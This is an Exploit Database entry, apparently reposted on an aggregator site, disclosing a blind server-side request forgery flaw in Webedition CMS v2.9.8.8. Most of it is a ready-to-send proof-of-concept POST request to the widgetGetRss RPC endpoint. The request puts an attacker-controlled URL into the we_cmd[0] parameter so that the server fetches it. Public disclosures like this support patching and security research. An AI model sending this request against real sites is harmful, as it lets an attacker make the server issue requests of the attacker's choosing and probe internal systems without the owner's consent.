Webedition CMS v2.9.8.8 – Blind SSRF

• Exploit Database
• 17 阅读

• 作者： Mirabbas Ağalarov
  日期： 2023-10-09
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51743/

• Exploit Title: Webedition CMS v2.9.8.8 - Blind SSRF
  Application: Webedition CMS
  Version: v2.9.8.8 
  Bugs:Blind SSRF
  Technology: PHP
  Vendor URL: https://www.webedition.org/
  Software Link: https://download.webedition.org/releases/OnlineInstaller.tgz?p=1
  Date of found: 07.09.2023
  Author: Mirabbas Ağalarov
  Tested on: Linux 
  
  
  2. Technical Details & POC
  ========================================
  write https://youserver/test.xml to we_cmd[0] parameter
  
  poc request
  
  POST /webEdition/rpc.php?cmd=widgetGetRss&mod=rss HTTP/1.1
  Host: localhost
  Content-Length: 141
  sec-ch-ua: 
  Accept: application/json, text/javascript, */*; q=0.01
  Content-Type: application/x-www-form-urlencoded; charset=UTF-8
  X-Requested-With: XMLHttpRequest
  sec-ch-ua-mobile: ?0
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
  sec-ch-ua-platform: ""
  Origin: http://localhost
  Sec-Fetch-Site: same-origin
  Sec-Fetch-Mode: cors
  Sec-Fetch-Dest: empty
  Referer: http://localhost/webEdition/index.php?we_cmd[0]=startWE
  Accept-Encoding: gzip, deflate
  Accept-Language: en-US,en;q=0.9
  Cookie: treewidth_main=300; WESESSION=41a9164e60666254199b3ea1cd3d2e0ad969c379; cookie=yep; treewidth_main=300
  Connection: close
  
  we_cmd[0]=https://YOU-SERVER/test.xml&we_cmd[1]=111000&we_cmd[2]=0&we_cmd[3]=110000&we_cmd[4]=&we_cmd[5]=m_3